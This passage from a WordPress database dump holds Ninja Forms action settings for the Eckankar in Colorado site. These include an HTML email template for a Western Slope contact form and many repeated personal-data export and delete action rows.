</strong>{field:textarea_65}</span></p><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n<tr><br /><br />\r\n<td align=\"center\" valign=\"top\"><br /><br />\r\n<table id=\"emailFooter\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"8\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td align=\"left\" valign=\"top\">If you have any questions regarding the origin of this form, please feel free to contact the Eckankar In Colorado webmaster: webmaster@eckankar-colorado.org<br /><br />\r\n<br /><br />\r\n<p style=\"color: #23507d\"><em>Your Eckankar in Colorado Team<br /><br /><br />\r\n <a href=\"https://www.eckankar-colorado.org\">https://www.eckankar-colorado.org</a></em></p><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n<p> </p>','email_message','<table id=\"bodyTable\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td align=\"center\" valign=\"top\"><br /><br />\r\n<table id=\"emailContainer\" border=\"0\" width=\"800\" cellspacing=\"0\" cellpadding=\"10\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td align=\"left\" valign=\"top\"><br /><br />\r\n<table id=\"emailHeader\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td style=\"background-color: #ebebeb;padding-left: 10px;color: #23507d;line-height: 80%\" align=\"left<br /><br />\r\n                                \" valign=\"top\"><br /><br />\r\n<h1>Eckankar In Colorado</h1><br /><br />\r\n</td><br /><br />\r\n<td> </td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n<tr><br /><br />\r\n<td align=\"center\" valign=\"top\"><br /><br />\r\n<table id=\"emailBody\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"8\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td align=\"left\" valign=\"top\"><br /><br />\r\n<p><strong>Hello! You have a new <span style=\"color: #23507d\">Western Slope Leadership Communications</span> form submission.<br /><br /><br />\r\n</strong><br /><br /><br />\r\n This form was generated from a user submission on the <em>Eckankar In Colorado</em> website. You are receiving this submission because you are listed as a contact for the <em>Western Slope ECK organization</em>.<br /><br /><br />\r\n <strong><br /><br /><br />\r\nThe following person has requested contact with an ECK representative. Here is the information that <span style=\"color: #666666\">{field:textbox_57} {field:lastname_58}</span> has submitted:</strong></p><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n<table id=\"emailHeader\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"20\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td style=\"background-color: #ebebeb;padding: 10px;border: 1px solid #cccccc\" align=\"left<br /><br />\r\n                                \" valign=\"top\"><br /><br />\r\n<p><span style=\"color: #333333\"><strong>FIRST NAME:</strong> {field:textbox_57}<br /><br /><br />\r\n </span><span style=\"color: #333333\"><strong>LAST NAME:</strong> {field:lastname_58}<br /><br /><br />\r\n </span><span style=\"color: #333333\"><strong>EMAIL:</strong> {field:email_59}<br /><br /><br />\r\n </span><span style=\"color: #333333\"><strong>TELEPHONE:</strong> {field:phone_60}</span><br /><br /><br />\r\n <span style=\"color: #333333\"><strong>LOCAL AREA:</strong> {field:listselect_61}<br /><br /><br />\r\n </span><span style=\"color: #333333\"><strong>PERSON YOU WOULD LIKE TO CONTACT:</strong> {field:listselect_64}</span></p><br /><br />\r\n<p><span style=\"color: #333333\"><strong>MESSAGE: </strong>{field:textarea_65}</span></p><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n<tr><br /><br />\r\n<td align=\"center\" valign=\"top\"><br /><br />\r\n<table id=\"emailFooter\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"8\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td align=\"left\" valign=\"top\">If you have any questions regarding the origin of this form, please feel free to contact the Eckankar In Colorado webmaster: webmaster@eckankar-colorado.org<br /><br />\r\n<br /><br />\r\n<p style=\"color: #23507d\"><em>Your Eckankar in Colorado Team<br /><br /><br />\r\n <a href=\"https://www.eckankar-colorado.org\">https://www.eckankar-colorado.org</a></em></p><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n<p> </p>'),(3177,120,'attach_csv','0','attach_csv','0'),(3178,120,'email_format','html','email_format','html'),(3179,120,'reply_to','','reply_to',''),(3180,120,'cc','','cc',''),(3181,120,'bcc','','bcc',''),(3182,120,'redirect_url','','redirect_url',''),(3183,120,'success_msg','','success_msg',''),(3184,120,'label','Admin Email','label','Admin Email'),(3185,120,'objectType','Action','objectType','Action'),(3186,120,'objectDomain','actions','objectDomain','actions'),(3187,120,'editActive','','editActive',''),(3188,120,'conditions','a:6:{s:9:\"collapsed\";b:0;s:7:\"process\";i:1;s:9:\"connector\";s:3:\"all\";s:4:\"when\";a:1:{i:0;a:6:{s:9:\"connector\";s:3:\"AND\";s:3:\"key\";s:0:\"\";s:10:\"comparator\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"when\";}}s:4:\"then\";a:1:{i:0;a:5:{s:3:\"key\";s:0:\"\";s:7:\"trigger\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"then\";}}s:4:\"else\";a:0:{}}','conditions','a:6:{s:9:\"collapsed\";b:0;s:7:\"process\";i:1;s:9:\"connector\";s:3:\"all\";s:4:\"when\";a:1:{i:0;a:6:{s:9:\"connector\";s:3:\"AND\";s:3:\"key\";s:0:\"\";s:10:\"comparator\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"when\";}}s:4:\"then\";a:1:{i:0;a:5:{s:3:\"key\";s:0:\"\";s:7:\"trigger\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"then\";}}s:4:\"else\";a:0:{}}'),(3189,120,'payment_gateways','','payment_gateways',''),(3190,120,'payment_total','0','payment_total','0'),(3191,120,'tag','','tag',''),(3192,120,'email_message_plain','','email_message_plain',''),(3193,120,'drawerDisabled','','drawerDisabled',''),(3194,120,'parent_id','30','parent_id','30'),(3305,5,'message','This action adds users to WordPress\' personal data export tool, allowing admins to comply with the GDPR and other privacy regulations from the site\'s front end.','message','This action adds users to WordPress\' personal data export tool, allowing admins to comply with the GDPR and other privacy regulations from the site\'s front end.'),(3306,5,'submitter_email','','submitter_email',''),(3307,5,'fields-save-toggle','save_all','fields-save-toggle','save_all'),(3308,5,'exception_fields','a:0:{}','exception_fields','a:0:{}'),(3309,5,'set_subs_to_expire','0','set_subs_to_expire','0'),(3310,5,'subs_expire_time','90','subs_expire_time','90'),(3311,6,'message','This action adds users to WordPress\' personal data delete tool, allowing admins to comply with the GDPR and other privacy regulations from the site\'s front end.','message','This action adds users to WordPress\' personal data delete tool, allowing admins to comply with the GDPR and other privacy regulations from the site\'s front end.'),(3312,7,'message','This action adds users to WordPress\' personal data export tool, allowing admins to comply with the GDPR and other privacy regulations from the site\'s front end.','message','This action adds users to WordPress\' personal data export tool, allowing admins to comply with the GDPR and other privacy regulations from the site\'s front end.'),(3313,7,'submitter_email','','submitter_email',''),(3314,7,'fields-save-toggle','save_all','fields-save-toggle','save_all'),(3315,7,'exception_fields','a:0:{}','exception_fields','a:0:{}'),(3316,7,'set_subs_to_expire','0','set_subs_to_expire','0'),(3317,7,'subs_expire_time','90','subs_expire_time','90'),(3318,8,'message','This action adds users to WordPress\' personal data delete tool, allowing admins to comply with the GDPR and other privacy regulations from the site\'s front end.','message','This action adds users to WordPress\' personal data delete tool, allowing admins to comply with the GDPR and other privacy regulations from the site\'s front end.'),(3319,13,'objectType','Action','objectType','Action'),(3320,13,'objectDomain','actions','objectDomain','actions'),(3321,13,'editActive','','editActive',''),(3322,13,'message','This action adds users to WordPress\' personal data export tool, allowing admins to comply with the GDPR and other privacy regulations from the site\'s front end.','message','This action adds users to WordPress\' personal data export tool, allowing admins to comply with the GDPR and other privacy regulations from the site\'s front end.'),(3323,13,'payment_gateways','','payment_gateways',''),(3324,13,'payment_total','0','payment_total','0'),(3325,13,'tag','','tag',''),(3326,13,'to','{wp:admin_email}','to','{wp:admin_email}'),(3327,13,'reply_to','','reply_to',''),(3328,13,'email_subject','Ninja Forms Submission','email_subject','Ninja Forms Submission'),(3329,13,'email_message','{fields_table}','email_message','{fields_table}'),(3330,13,'email_message_plain','','email_message_plain',''),(3331,13,'from_name','','from_name',''),(3332,13,'from_address','','from_address',''),(3333,13,'email_format','html','email_format','html'),(3334,13,'cc','','cc',''),(3335,13,'bcc','','bcc',''),(3336,13,'redirect_url','','redirect_url',''),(3337,13,'submitter_email','','submitter_email',''),(3338,13,'fields-save-toggle','save_all','fields-save-toggle','save_all'),(3339,13,'exception_fields','a:0:{}','exception_fields','a:0:{}'),(3340,13,'set_subs_to_expire','0','set_subs_to_expire','0'),(3341,13,'subs_expire_time','90','subs_expire_time','90'),(3342,14,'objectType','Action','objectType','Action'),(3343,14,'objectDomain','actions','objectDomain','actions'),(3344,14,'editActive','','editActive',''),(3345,14,'message','This action adds users to WordPress\' personal data delete tool, allowing admins to comply with the GDPR and other privacy regulations from the site\'s front end.','message','This action adds users to WordPress\' personal data delete tool, allowing admins to comply with the GDPR and other privacy regulations from the site\'s front end.'),(3346,14,'payment_gateways','','payment_gateways',''),(3347,14,'payment_total','0','payment_total','0'),(3348,14,'tag','','tag',''),(3349,14,'email_message_plain','','email_message_plain',''),(3350,15,'objectType','Action','objectType','Action'),(3351,15,'objectDomain','actions','objectDomain','actions'),(3352,15,'editActive','','editActive',''),(3353,15,'message','This action adds users to WordPress\' personal data export tool, allowing admins to comply with the GDPR and other privacy regulations from the site\'s front end.','message','This action adds users to WordPress\' personal data export tool, allowing admins to comply with the GDPR and other privacy regulations from the site\'s front end.'),(3354,15,'payment_gateways','','payment_gateways',''),(3355,15,'payment_total','0','payment_total','0'),(3356,15,'tag','','tag',''),(3357,15,'email_message_plain','','email_message_plain',''),(3358,15,'submitter_email','','submitter_email',''),(3359,15,'fields-save-toggle','save_all','fields-save-toggle','save_all'),(3360,15,'exception_fields','a:0:{}','exception_fields','a:0:{}'),(3361,15,'set_subs_to_expire','0','set_subs_to_expire','0'),(3362,15,'subs_expire_time','90','subs_expire_time','90'),(3363,16,'objectType','Action','objectType','Action'),(3364,16,'objectDomain','actions','objectDomain','actions'),(3365,16,'editActive','','editActive',''),(3366,16,'message','This action adds users to WordPress\' personal data delete tool, allowing admins to comply with the GDPR and other privacy regulations from the site\'s front end.','message','This action adds users to WordPress\' personal data delete tool, allowing admins to comply with the GDPR and other privacy regulations from the site\'s front end.'),(3367,16,'payment_gateways','','payment_gateways',''),(3368,16,'payment_total','0','payment_total','0'),(3369,16,'tag','','tag',''),(3370,16,'email_message_plain','','email_message_plain',''),(3371,17,'message','This action adds users to WordPress\' personal data export tool, allowing admins to comply with the GDPR and other privacy regulations from the site\'s front end.','message','This action adds users to WordPress\' personal data export tool, allowing admins to comply with the GDPR and other privacy regulations from the site\'s front end.'),(3372,17,'submitter_email','','submitter_email',''),(3373,17,'fields-save-toggle','save_all','fields-save-toggle','save_all'),(3374,17,'exception_fields','a:0:{}','exception_fields','a:0:{}'),(3375,17,'set_subs_to_expire','0','set_subs_to_expire','0'),(3376,17,'subs_expire_time','90','subs_expire_time','90'),(3377,18,'message','This action adds users to WordPress\' personal data delete tool, allowing admins to comply with the GDPR and other privacy regulations from the site\'s front end.','message','This action adds users to WordPress\' personal data delete tool, allowing admins to comply with the GDPR and other privacy regulations from the site\'s front end.'),(3378,19,'message','This action adds users to WordPress\' personal data export tool, allowing admins to comply with the GDPR and other privacy regulations from the site\'s front end.','message','This action adds users to WordPress\' personal data export tool, allowing admins to comply with the GDPR and other privacy regulations from the site\'s front end.'),(3379,19,'submitter_email','','submitter_email',''),(3380,19,'fields-save-toggle','save_all','fields-save-toggle','save_all'),(3381,19,'exception_fields','a:0:{}','exception_fields','a:0:{}'),(3382,19,'set_subs_to_expire','0','set_subs_to_expire','0'),(3383,19,'subs_expire_time','90','subs_expire_time','90'),(3384,20,'message','This action adds users to WordPress\' personal data delete tool, allowing admins to comply with the GDPR and other privacy regulations from the site\'s front end.','message','This action adds users to WordPress\' personal data delete tool, allowing admins to comply with the GDPR and other privacy regulations from the site\'s front end.'),(3385,29,'message','This action adds users to WordPress\' personal data export tool, allowing admins to comply with the GDPR and other privacy regulations from the site\'s front end.','message','This action adds users to WordPress\' personal data export tool, allowing admins to comply with the GDPR and other privacy regulations from the site\'s front end.'),(3386,29,'submitter_email','','submitter_email',''),(3387,29,'fields-save-toggle','save_all','fields-save-toggle','save_all'),(3388,29,'exception_fields','a:0:{}','exception_fields','a:0:{}'),(3389,29,'set_subs_to_expire','0','set_subs_to_expire','0'),(3390,29,'subs_expire_time','90','subs_expire_time','90'),(3391,30,'message','This action adds users to WordPress\' personal data delete tool, allowing admins to comply with the GDPR and other privacy regulations from the site\'s front end.','message','This action adds users to WordPress\' personal data delete tool, allowing admins to comply with the GDPR and other privacy regulations from the site\'s front end.'),(3392,31,'message','This action adds users to WordPress\' personal data export tool, allowing admins to comply with the GDPR and other privacy regulations from the site\'s front end.','message','This action adds users to WordPress\' personal data export tool, allowing admins to comply with the GDPR and other privacy regulations from the site\'s front end.'),(3393,31,'submitter_email','','submitter_email',''),(3394,31,'fields-save-toggle','save_all','fields-save-toggle','save_all'),(3395,31,'exception_fields','a:0:{}','exception_fields','a:0:{}'),(3396,31,'set_subs_to_expire','0','set_subs_to_expire','0'),(3397,31,'subs_expire_time','90','subs_expire_time','90'),(3398,32,'message','This action adds users to WordPress\' personal data delete tool, allowing admins to comply with the GDPR and other privacy regulations from the site\'s front end.','message','This action adds users to WordPress\' personal data delete tool, allowing admins to comply with the GDPR and other privacy regulations from the site\'s front end.'),(3399,33,'message','This action adds users to WordPress\' personal data export tool, allowing admins to comply with the GDPR and other privacy regulations from the site\'s front end.','message','This action adds users to WordPress\' personal data export tool, allowing admins to comply with the GDPR and other privacy regulations from the site\'s front end.'),(3400,33,'submitter_email','','submitter_email',''),(3401,33,'fields-save-toggle','save_all','fields-save-toggle','save_all'),(3402,33,'exception_fields','a:0:{}','exception_fields','a:0:{}'),(3403,33,'set_subs_to_expire','0','set_subs_to_expire','0'),(3404,33,'subs_expire_time','90','subs_expire_time','90'),(3405,34,'message','This action adds users to WordPress\' personal data delete tool, allowing admins to comply with the GDPR and other privacy regulations from the site\'s front end.','message','This action adds users to WordPress\' personal data delete tool, allowing admins to comply with the GDPR and other privacy regulations from the site\'s front end.'),(3406,35,'message','This action adds users to WordPress\' personal data export tool, allowing admins to comply with the GDPR and other privacy regulations from the site\'s front end.','message','This action adds users to WordPress\' personal data export tool, allowing admins to comply with the GDPR and other privacy regulations from the site\'s front end.'),(3407,35,'submitter_email','','submitter_email',''),(3408,35,'fields-save-toggle','save_all','fields-save-toggle','save_all'),(3409,35,'exception_fields','a:0:{}','exception_fields','a:0:{}'),(3410,35,'set_subs_to_expire','0','set_subs_to_expire','0'),(3411,35,'subs_expire_time','90','subs_expire_time','90'),(3412,36,'message','This action adds users to WordPress\' personal data delete tool, allowing admins to comply with the GDPR and other privacy regulations from the site\'s front end.','message','This action adds users to WordPress\' personal data delete tool, allowing admins to comply with the GDPR and other privacy regulations from the site\'s front end.'),(3413,37,'message','This action adds users to WordPress\' personal data export tool, allowing admins to comply with the GDPR and other privacy regulations from the site\'s front end.','message','This action adds users to WordPress\' personal data export tool, allowing admins to comply with the GDPR and other privacy regulations from the site\'s front end.'),(3414,37,'submitter_email','','submitter_email',''),(3415,37,'fields-save-toggle','save_all','fields-save-toggle','save_all'),(3416,37,'exception_fields','a:0:{}','exception_fields','a:0:{}'),(3417,37,'set_subs_to_expire','0','set_subs_to_expire','0'),(3418,37,'subs_expire_time','90','subs_expire_time','90'),(3419,38,'message','This action adds users to WordPress\' personal data delete tool, allowing admins to comply with the GDPR and other privacy regulations from the site\'s front end.','message','This action adds users to WordPress\' personal data delete tool, allowing admins to comply with the GDPR and other privacy regulations from the site\'s front end.'),(3420,39,'message','This action adds users to WordPress\' personal data export tool, allowing admins to comply with the GDPR and other privacy regulations from the site\'s front end.','message','This action adds users to WordPress\' personal data export tool, allowing admins to comply with the GDPR and other privacy regulations from the site\'s front end.'),(3421,39,'submitter_email','','submitter_email',''),(3422,39,'fields-save-toggle','save_all','fields-save-toggle','save_all'),(3423,39,'exception_fields','a:0:{}','exception_fields','a:0:{}'),(3424,39,'set_subs_to_expire','0','set_subs_to_expire','0'),(3425,39,'subs_expire_time','90','subs_expire_time','90'),(3426,40,'message','This action adds users to WordPress\' personal data delete tool, allowing admins to comply with the GDPR and other privacy regulations from the site\'s front end.','message','This action adds users to WordPress\' personal data delete tool, allowing admins to comply with the GDPR and other privacy regulations from the site\'s front end.'),(3427,45,'message','This action adds users to WordPress\' personal data export tool, allowing admins to comply with the GDPR and other privacy regulations from the site\'s front end.','message','This action adds users to WordPress\' personal data export tool, allowing admins to comply with the GDPR and other privacy regulations from the site\'s front end.'),(3428,45,'submitter_email','','submitter_email',''),(3429,45,'fields-save-toggle','save_all','fields-save-toggle','save_all'),(3430,45,'exception_fields','a:0:{}','exception_fields','a:0:{}'),(3431,45,'set_subs_to_expire','0','set_subs_to_expire','0'),(3432,45,'subs_expire_time','90','subs_expire_time','90'),(3433,46,'message','This action adds users to WordPress\' personal data delete tool, allowing admins to comply with the GDPR and other privacy regulations from the site\'s front end.','message','This action adds users to WordPress\' personal data delete tool, allowing admins to comply with the GDPR and other privacy regulations from the site\'s front end.'),(3434,47,'message','This action adds users to WordPress\' personal data export tool, allowing admins to comply with the GDPR and other privacy regulations from the site\'s front end.','message','This action adds users to WordPress\' personal data export tool, allowing admins to comply with the GDPR and other privacy regulations from the site\'s front end.'),(3435,47,'submitter_email','','submitter_email',''),(3436,47,'fields-save-toggle','save_all','fields-save-toggle','save_all'),(3437,47,'exception_fields','a:0:{}','exception_fields','a:0:{}'),(3438,47,'set_subs_to_expire','0','set_subs_to_expire','0'),(3439,47,'subs_expire_time','90','subs_expire_time','90'),(3440,48,'message','This action adds users to WordPress\' personal data delete tool, allowing admins to comply with the GDPR and other privacy regulations from the site\'s front end.','message','This action adds users to WordPress\' personal data delete tool, allowing admins to comply with the GDPR and other privacy regulations from the site\'s front end.'),(3441,49,'objectType','Action','objectType','Action'),(3442,49,'objectDomain','actions','objectDomain','actions'),(3443,49,'editActive','','editActive',''),(3444,49,'message','This action adds users to WordPress\' personal data export tool, allowing admins to comply with the GDPR and other privacy regulations from the site\'s front end.','message','This action adds users to WordPress\' personal data export tool, allowing admins to comply with the GDPR and other privacy regulations from the site\'s front end.'),(3445,49,'payment_gateways','','payment_gateways',''),(3446,49,'payment_total','0','payment_total','0'),(3447,49,'tag','','tag',''),(3448,49,'to','{wp:admin_email}','to','{wp:admin_email}'),(3449,49,'reply_to','','reply_to',''),(3450,49,'email_subject','Ninja Forms Submission','email_subject','Ninja Forms Submission'),(3451,49,'email_message','{fields_table}','email_message','{fields_table}'),(3452,49,'email_message_plain','','email_message_plain',''),(3453,49,'from_name','','from_name',''),(3454,49,'from_address','','from_address',''),(3455,49,'email_format','html','email_format','html'),(3456,49,'cc','','cc',''),(3457,49,'bcc','','bcc',''),(3458,49,'redirect_url','','redirect_url',''),(3459,49,'submitter_email','','submitter_email',''),(3460,49,'fields-save-toggle','save_all','fields-save-toggle','save_all'),(3461,49,'exception_fields','a:0:{}','exception_fields','a:0:{}'),(3462,49,'set_subs_to_expire','0','set_subs_to_expire','0'),(3463,49,'subs_expire_time','90','subs_expire_time','90'),(3464,50,'objectType','Action','objectType','Action'),(3465,50,'objectDomain','actions','objectDomain','actions'),(3466,50,'editActive','','editActive',''),(3467,50,'message','This action adds users to WordPress\' personal data delete tool, allowing admins to comply with the GDPR and other privacy regulations from the site\'s front end.','message','This action adds users to WordPress\' personal data delete tool, allowing admins to comply with the GDPR and other privacy regulations from the site\'s front end.'),(3468,50,'payment_gateways','','payment_gateways',''),(3469,50,'payment_total','0','payment_total','0'),(3470,50,'tag','','tag',''),(3471,50,'email_message_plain','','email_message_plain',''),(3472,51,'objectType','Action','objectType','Action'),(3473,51,'objectDomain','actions','objectDomain','actions'),(3474,51,'editActive','','editActive',''),(3475,51,'message','This action adds users to WordPress\' personal data export tool, allowing admins to comply with the GDPR and other privacy regulations from the site\'s front end.','message','This action adds users to WordPress\' personal data export tool, allowing admins to comply with the GDPR and other privacy regulations from the site\'s front end.'),(3476,51,'payment_gateways','','payment_gateways',''),(3477,51,'payment_total','0','payment_total','0'),(3478,51,'tag','','tag',''),(3479,51,'email_message_plain','','email_message_plain',''),(3480,51,'submitter_email','','submitter_email',''),(3481,51,'fields-save-toggle','save_all','fields-save-toggle','save_all'),(3482,51,'exception_fields','a:0:{}','exception_fields','a:0:{}'),(3483,51,'set_subs_to_expire','0','set_subs_to_expire','0'),(3484,51,'subs_expire_time','90','subs_expire_time','90'),(3485,52,'objectType','Action','objectType','Action'),(3486,52,'objectDomain','actions','objectDomain','actions'),(3487,52,'editActive','','editActive',''),(3488,52,'message','This action adds users to WordPress\' personal data delete tool, allowing admins to comply with the GDPR and other privacy regulations from the site\'s front end.','message','This action adds users to WordPress\' personal data delete tool, allowing admins to comply with the GDPR and other privacy regulations from the site\'s front end.'),(3489,52,'payment_gateways','','payment_gateways',''),(3490,52,'payment_total','0','payment_total','0'),(3491,52,'tag','','tag',''),(3492,52,'email_message_plain','','email_message_plain',''),(3493,53,'message','This action adds users to WordPress\' personal data export tool, allowing admins to comply with the GDPR and other privacy regulations from the site\'s front end.','message','This action adds users to WordPress\' personal data export tool, allowing admins to comply with the GDPR and other privacy regulations from the site\'s front end.'),(3494,53,'submitter_email','','submitter_email',''),(3495,53,'fields-save-toggle','save_all','fields-save-toggle','save_all'),(3496,53,'exception_fields','a:0:{}','exception_fields','a:0:{}'),(3497,53,'set_subs_to_expire','0','set_subs_to_expire','0'),(3498,53,'subs_expire_time','90','subs_expire_time','90'),(3499,54,'message','This action adds users to WordPress\' personal data delete tool, allowing admins to comply with the GDPR and other privacy regulations from the site\'s front end.','message','This action adds users to WordPress\' personal data delete tool, allowing admins to comply with the GDPR and other privacy regulations from the site\'s front end.'),(3500,55,'message','This action adds users to WordPress\' personal data export tool, allowing admins to comply with the GDPR and other privacy regulations from the site\'s front end.','message','This action adds users to WordPress\' personal data export tool, allowing admins to comply with the GDPR and other privacy regulations from the site\'s front end.'),(3501,55,'submitter_email','','submitter_email',''),(3502,55,'fields-save-toggle','save_all','fields-save-toggle','save_all'),(3503,55,'exception_fields','a:0:{}','exception_fields','a:0:{}'),(3504,55,'set_subs_to_expire','0','set_subs_to_expire','0'),(3505,55,'subs_expire_time','90','subs_expire_time','90'),(3506,56,'message','This action adds users to WordPress\' personal data delete tool, allowing admins to comply with the GDPR and other privacy regulations from the site\'s front end.','message','This action adds users to WordPress\' personal data delete tool, allowing admins to comply with the GDPR and other privacy regulations from the site\'s front end.'),(3507,57,'message','This action adds users to WordPress\' personal data export tool, allowing admins to comply with the GDPR and other privacy regulations from the site\'s front end.','message','This action adds users to WordPress\' personal data export tool, allowing admins to comply with the GDPR and other privacy regulations from the site\'s front end.'),(3508,57,'submitter_email','','submitter_email',''),(3509,57,'fields-save-toggle','save_all','fields-save-toggle','save_all'),(3510,57,'exception_fields','a:0:{}','exception_fields','a:0:{}'),(3511,57,'set_subs_to_expire','0','set_subs_to_expire','0'),(3512,57,'subs_expire_time','90','subs_expire_time','90'),(3513,58,'message','This action adds users to WordPress\' personal data delete tool, allowing admins to comply with the GDPR and other privacy regulations from the site\'s front end.','message','This action adds users to WordPress\' personal data delete tool, allowing admins to comply with the GDPR and other privacy regulations from the site\'s front end.'),(3514,59,'message','This action adds users to WordPress\' personal data export tool, allowing admins to comply with the GDPR and other privacy regulations from the site\'s front end.','message','This action adds users to WordPress\' personal data export tool, allowing admins to comply with the GDPR and other privacy regulations from the site\'s front end.'),(3515,59,'submitter_email','','submitter_email',''),(3516,59,'fields-save-toggle','save_all','fields-save-toggle','save_all'),(3517,59,'exception_fields','a:0:{}','exception_fields','a:0:{}'),(3518,59,'set_subs_to_expire','0','set_subs_to_expire','0'),(3519,59,'subs_expire_time','90','subs_expire_time','90'),(3520,60,'message','This action adds users to WordPress\' personal data delete tool, allowing admins to comply with the GDPR and other privacy regulations from the site\'s front end.','message','This action adds users to WordPress\' personal data delete tool, allowing admins to comply with the GDPR and other privacy regulations from the site\'s front end.'),(3521,61,'message','This action adds users to WordPress\' personal data export tool, allowing admins to comply with the GDPR and other privacy regulations from the site\'s front end.','message','This action adds users to WordPress\' personal data export tool, allowing admins to comply with the GDPR and other privacy regulations from the site\'s front end.'),(3522,61,'submitter_email','','submitter_email',''),(3523,61,'fields-save-toggle','save_all','fields-save-toggle','save_all'),(3524,61,'exception_fields','a:0:{}','exception_fields','a:0:{}'),(3525,61,'set_subs_to_expire','0','set_subs_to_expire','0'),(3526,61,'subs_expire_time','90','subs_expire_time','90'),(3527,62,'message','This action adds users to WordPress\' personal data delete tool, allowing admins to comply with the GDPR and other privacy regulations from the site\'s front end.','message','This action adds users to WordPress\' personal data delete tool, allowing admins to comply with the GDPR and other privacy regulations from the site\'s front end.'),(3528,63,'message','This action adds users to WordPress\' personal data export tool, allowing admins to comply with the GDPR and other privacy regulations from the site\'s front end.','message','This action adds users to WordPress\' personal data export tool, allowing admins to comply with the GDPR and other privacy regulations from the site\'s front end.'),(3529,63,'submitter_email','','submitter_email',''),(3530,63,'fields-save-toggle','save_all','fields-save-toggle','save_all'),(3531,63,'exception_fields','a:0:{}','exception_fields','a:0:{}'),(3532,63,'set_subs_to_expire','0','set_subs_to_expire','0'),(3533,63,'subs_expire_time','90','subs_expire_time','90'),(3534,64,'message','This action adds users to WordPress\' personal data delete tool, allowing admins to comply with the GDPR and other privacy regulations from the site\'s front end.','message','This action adds users to WordPress\' personal data delete tool, allowing admins to comply with the GDPR and other privacy regulations from the site\'s front end.'),(3535,69,'message','This action adds users to WordPress\' personal data export tool, allowing admins to comply with the GDPR and other privacy regulations from the site\'s front end.','message','This action adds users to WordPress\' personal data export tool, allowing admins to comply with the GDPR and other privacy regulations from the site\'s front end.'),(3536,69,'submitter_email','','submitter_email',''),(3537,69,'fields-save-toggle','save_all','fields-save-toggle','save_all'),(3538,69,'exception_fields','a:0:{}','exception_fields','a:0:{}'),(3539,69,'set_subs_to_expire','0','set_subs_to_expire','0'),(3540,69,'subs_expire_time','90','subs_expire_time','90'),(3541,70,'message','This action adds users to WordPress\' personal data delete tool, allowing admins to comply with the GDPR and other privacy regulations from the site\'s front end.','message','This action adds users to WordPress\' personal data delete tool, allowing admins to comply with the GDPR and other privacy regulations from the site\'s front end.'),(3542,71,'message','This action adds users to WordPress\' personal data export tool, allowing admins to comply with the GDPR and other privacy regulations from the site\'s front end.','message','This action adds users to WordPress\' personal data export tool, allowing admins to comply with the GDPR and other privacy regulations from the site\'s front end.'),(3543,71,'submitter_email','','submitter_email',''),(3544,71,'fields-save-toggle','save_all','fields-save-toggle','save_all'),(3545,71,'exception_fields','a:0:{}','exception_fields','a:0:{}'),(3546,71,'set_subs_to_expire','0','set_subs_to_expire','0'),(3547,71,'subs_expire_time','90','subs_expire_time','90'),(3548,72,'message','This action adds users to WordPress\' personal data delete tool, allowing admins to comply with the GDPR and other privacy regulations from the site\'s front end.','message','This action adds users to WordPress\' personal data delete tool, allowing admins to comply with the GDPR and other privacy regulations from the site\'s front end.'),(3549,73,'message','This action adds users to WordPress\' personal data export tool, allowing admins to comply with the GDPR and other privacy regulations from the site\'s front end.','message','This action adds users to WordPress\' personal data export tool, allowing admins to comply with the GDPR and other privacy regulations from the site\'s front end.'),(3550,73,'submitter_email','','submitter_email',''),(3551,73,'fields-save-toggle','save_all','fields-save-toggle','save_all'),(3552,73,'exception_fields','a:0:{}','exception_fields','a:0:{}'),(3553,73,'set_subs_to_expire','0','set_subs_to_expire','0'),(3554,73,'subs_expire_time','90','subs_expire_time','90'),(3555,74,'message','This action adds users to WordPress\' personal data delete tool, allowing admins to comply with the GDPR and other privacy regulations from the site\'s front end.','message','This action adds users to WordPress\' personal data delete tool, allowing admins to comply with the GDPR and other privacy regulations from the site\'s front end.'),(3556,75,'message','This action adds users to WordPress\' personal data export tool, allowing admins to comply with the GDPR and other privacy regulations from the site\'s front end.','message','This action adds users to WordPress\' personal data export tool, allowing admins to comply with the GDPR and other privacy regulations from the site\'s front 